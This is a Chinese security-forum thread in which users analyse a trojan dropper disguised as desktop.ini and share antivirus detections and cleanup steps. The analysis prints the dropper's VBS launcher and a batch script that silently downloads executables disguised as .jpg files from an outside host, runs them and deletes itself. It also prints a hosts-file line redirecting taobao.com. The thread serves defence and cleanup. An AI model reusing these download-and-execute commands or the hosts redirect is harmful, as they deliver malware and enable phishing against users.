发现未知病毒 有经验者研究下

笔迹

今天发现有程序写入启动项 经过查看 发现启动的文件是C:\WINDOWS\Web\4.jpg  同时还发现web文件夹下还多了好几个文件 感觉这些文件可疑于是我就查找其他可随机启动的位置  最终在好几个用户启动文件夹里发现了大小为204 KB 图标为自解压程序的desktop.ini 文件  通过用winrar程序解压  释放出了 上面web文件夹多出的文件
在此希望有经验的研究下  告诉我它的危害  怎么彻底清除    用金山扫描过了不报毒   还有 那个启动项的名称不知道是否跟我的管理员用户名有关
因为我的用户名就是补丁

BitDefender

TIS解压报毒

小淘气

全部过红伞、、

BitDefender

http://camas.comodo.com/cgi-bin/ ... 55f7d267071848f5133

动作分析详情

Lgwu

下载样本，解压缩，文件为：病毒样本 desktop.ini 手动修改为exe 文件，可以看到是winrar
自解压文件，右键解压后存在三个文件：e3ereee.vbs ，vip.bat ，wget.exe
右键编辑e3ereee.vbs ，内容如下：

1. CreateObject("WScript.Shell").Run "cmd /cC:\WINDOWS\Web\vip.bat",0

复制代码

为运行vip.bat 批处理动作。
右键编辑vip.bat ，内容如下：

1. @echo off
   
2. ping 127.0.0.1 -n 310
   
3. wget [img]http://www.166m.info/1.jpg[/img] -P C:\WINDOWS\Web
   
4. wget [img]http://www.166m.info/2.jpg[/img] -P C:\WINDOWS\Web
   
5. wget [img]http://www.166m.info/3.jpg[/img] -P C:\WINDOWS\Web
   
6. wget [img]http://www.166m.info/4.jpg[/img] -P C:\WINDOWS\Web
   
7. wget [img]http://www.166m.info/5.jpg[/img] -P C:\WINDOWS\Web
   
8. wget [img]http://www.166m.info/6.jpg[/img] -P C:\WINDOWS\Web
   
9. "C:\WINDOWS\Web\1.jpg"
   
10. "C:\WINDOWS\Web\2.jpg"
    
11. "C:\WINDOWS\Web\3.jpg"
    
12. "C:\WINDOWS\Web\4.jpg"
    
13. "C:\WINDOWS\Web\5.jpg"
    
14. "C:\WINDOWS\Web\6.jpg"
    
15. @del %0

复制代码

从www,166m,info上面下载1～6.jpg到C:\WINDOWS\Web 并执行后，删除自身。
从vip.bat 内容看，wget.exe 应该只是下载工具，故略过分析。
手动迅雷下载1～6.jpg，5.jpg和6.jpg下载失败。360安全卫士扫描，全过。
粗略看了下，1.jpg为易语言所写。3.jpg依然为自解压文件，里面只有hots文件，内容如下：

1. 216.245.205.184   [url]www.taobao.com[/url]

复制代码

样本分析：
1.jpg
修改为1.exe 并运行，程序隐藏调用IE打开h ttp://www.199m.info/t.htm ，MDecoder 分析该网址，只是百度相关
的一些东西，应该没有危害。不明白该样本到底要干啥，只是弄点流量？





清理操作：
删除C:\WINDOWS\Web\1.jpg。

2.jpg
修改后缀，查看属性，版本信息里面名称为QvodInstall Module，以为是Qvod的安装模块。运行后才发现不是。
1.注册名为59045BAD的服务程序，值system32\59045BAD.sys 。（名字应该为随机）
2.一系列联网动作后，在C:\windows\temp 目录下创建N多exe和dll、tmp文件，注入到桌面以及ie等进程，并安装钩子。
3.创建C:\Documents and Settings\NetworkService\Application Data\Dna.sys ，注入到进程中。
4.对主流杀软做了镜像劫持。

3.jpg
修改后缀，为自解压文件，里面只有hots文件。内容见下图。



清理操作：
删除C:\WINDOWS\Web\3.jpg ，查看host文件是否被修改。

4.jpg
有虚拟机运行检测。所以实体机测试，行为如下：
1.添加自身启动项。
2.创建C:\Documents and Settings\用户名\Application Data\Gang\8C.dl
c:\documents and settings\用户名\application data\gang\8d.dl
安装钩子。
3.删除Cookies 信息
4.联网操作221.231.138.20 : 80 (http)，指向南京。
5.结束QQ进程。
PS：登录QQ，并未发现有不当动作。





清理操作：
1.结束样本进程。
2.删除启动项。
3.删除C:\Documents and Settings\用户名\Application Data\Gang\8C.dl
c:\documents and settings\用户名\application data\gang\8d.dl


4.jpg样本清理操作比较多，稍候补充。如有不妥，请楼下指出并进行纠正。

jayavira

to eset

http://samples.nod32.com.sg/inde ... ae77be4e112050d13f6

expensive6688

瑞星MissRS20100825065352406995
突然发现有人加人气给我
病毒名称：Trojan.Win32.Generic.122A572A
解决版本号：22.62.02.01（现在已经可以升级到22.62.02.01了，升级后可查杀）

dengcc

I:\DOWN\病毒样本 desktop.ini/wget.exe         detected: Trojan.Win32.Hrup!IK

yunhan123

信息        2010-08-25  10:08:59        本次扫描文件总数:1,发现病毒数:1,清除病毒数:1                       
病毒        2010-08-25  10:08:58        c:\documents and settings\administrator\桌面\病毒样本 desktop.ini        Win32.Troj.Hrup        处理成功（操作：删除）       
金山

fatezero

KIS
Trojan.Win32.Hrup.bos